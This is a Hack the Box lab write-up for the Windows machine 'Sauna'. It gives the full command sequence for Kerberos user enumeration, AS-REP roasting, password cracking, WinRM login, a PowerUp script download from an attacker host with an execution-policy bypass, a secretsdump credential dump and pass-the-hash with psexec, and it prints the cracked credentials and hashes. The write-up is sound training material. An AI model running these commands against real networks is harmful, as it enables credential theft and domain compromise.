Sauna Hack the Box Walk Through
Summary:
Sauna was released on February 15, 2020 and is classified as an “Easy” difficulty Windows vulnerable machine on Hack the Box. In this walk-through, we will discuss the steps taken to compromise Sauna.
Information Gathering:
The first step taken was to run a scan against the vulnerable machine to identify all of the open ports and services present.
Autorecon, which is an automated recon script, was utilized for this task. To learn more about the commands AutoRecon runs under the hood such as the nmap command below, please visit the link in the references section.
nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.175
Based on the ports that were open, it was safe to assume that this machine was likely a Windows Domain Controller running Active Directory.
The next step taken was to run a gobuster scan to identify any interesting hidden web directories being hosted. Any sites that returned a ‘403’ error code were omitted from the output.
GoBuster Mini-Script
if [[ `gobuster -h 2>&1 | grep -F "mode (dir)"` ]]; then gobuster -u http://10.10.10.175:80/ -w /usr/share /seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp, aspx,jsp" -o tcp_80_http_gobuster.txt"; else gobuster dir -u http://10.10.10.175:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" -o "tcp_80_http_gobuster.txt"; fi
After manually visiting the page sources for some of the sites mentioned above, no luck was had in attempting to determine any vulnerable software versions present. However, the ‘about.html’ page proved to be useful as there was a list of bank employees listed on the page.
Open Firefox > Go to 10.10.10.175/about.html > Scroll to the bottom of the page
Although employee names were listed on this page, the corporate username structure typically differs from just a straight first name space last name. Some potential usernames were placed into a text file for possible brute forcing validation.
Additionally, some useful information on the domain was gathered from the LDAP port, 389. This was good background information to keep in mind moving forward.
Vulnerability Assessment:
Knowing that this is a Windows Domain Controller system, some different avenues of attack were possible. One interesting tidbit of gathered information came from running an nmap scan against the Kerberos service.
Although attempting to enumerate users via Kerberos did not fully work, it confirmed that the local domain was indeed ‘EGOTISTICAL-BANK.LOCAL’ and that there was an administrator account present within the domain.
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='egotistical-bank.local' 10.10.10.175
Using the kerbrute tool, 2 of the usernames from the ‘potential-usernames.txt’ file that was previously created were confirmed as valid.
kerbrute_linux_amd64 userenum potential-users.txt -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 -v
Utilizing the password spray function to guess a password did not work successfully. However, the output showcased that the user ‘fsmith’ did not require any Kerberos pre-authentication and thus was vulnerable to ‘AS-REP Roasting’. More information on this attack technique can be found in the links posted within the references section.
kerbrute_linux_amd64 passwordspray potential-users.txt Password123 -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 -v
The GetNPUsers.py script from impacket was then utilized alongside the validated ‘fsmith’ username in an attempt to obtain the krb5 AS-REP hash.
Per the description, this script will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). For those users with such configuration, a John The Ripper output will be generated so you can send it for cracking. This is better known as ‘AS-REP Roasting’.
It is clear that this worked because of the fact that the Kerberos preauthentication was not required.
~/Desktop/Tools/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile potential-users.txt -format john -outputfile npusers-sauna -dc-ip 10.10.10.175
Once this hash was obtained, John the Ripper was utilized to crack it and obtain the password.
sudo john --rules --wordlist=/usr/share/wordlists/rockyou.txt npusers-sauna
The clear-text password for user ‘fsmith’ was ‘Thestrokes23’.
Exploitation:
Going back to the nmap scan data, it was apparent the WinRM port (5985) was open. Trying to connect to it using the credentials obtained above ended up working.
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Privilege Escalation:
‘PowerUp.ps1’, which is a Powershell script that can enumerate common Windows privilege escalation vectors was utilized to in this specific instance. More information on the script can be found in the references section.
The below command was utilized to set up a simple HTTP server on the Kali attacking host.
sudo python -m SimpleHTTPServer 80
Then, the below powershell command was utilized to pull the script from Kali to the Windows machine.
powershell Invoke-WebRequest "http://<Kali_IP/PowerUp.ps1" -OutFile PowerUp.ps1
Once on the machine, the following commands were utilized to a) bypass the default execution policy, b) import the Powershell script in as a module so that it could be more easily run, and c) run all checks that the script has to offer.
Some of the checks include items like hijackable dll locations, stored credentials, and unquoted service paths.
powershell.exe -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
Based on the output of the script, it appeared that a service account titled ‘svc_loanmgr’ had clear-text AutoLogon credentials stored in the registry. Typically, service accounts have elevated privileges and can be used to escalate privileges or run commands in a privileged context. In this instance, the service account was used to dump the ntds.dit file containing the password hashes of all of the accounts present on the domain controller.
secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175 -outputfile secrets
From here, the passwords could have been cracked offline using John or Hashcat, or the hashes could have been re-passed to the machine to authenticate as a higher-privileged user, in this case the local administrator account on the machine. The latter was method was utilized.
psexec.py EGOSTISTICAL-BANK.LOCAL/administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff
Conclusion:
Although I utilized the forums quite a bit for the initial exploitation vector, I was able to learn a bit about Kerberos pre-authentication and AS-REP roasting. Although this was my first Windows box and Sauna was classified as “Easy” it took me a bit longer than I expected. I still would recommend going through this for anyone new to Hack the Box and hacking Windows machines as well as those interested in learning more about Kerberos.
References:
AutoRecon:
https://github.com/Tib3rius/AutoRecon
Kerbrute:
https://github.com/ropnop/kerbrute
Kerberos Pre-Authentication and AS-REP Roasting:
https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
GetNPUsers:
https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_21/examples/GetNPUsers.py
PowerUp:
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
PSExec:
https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py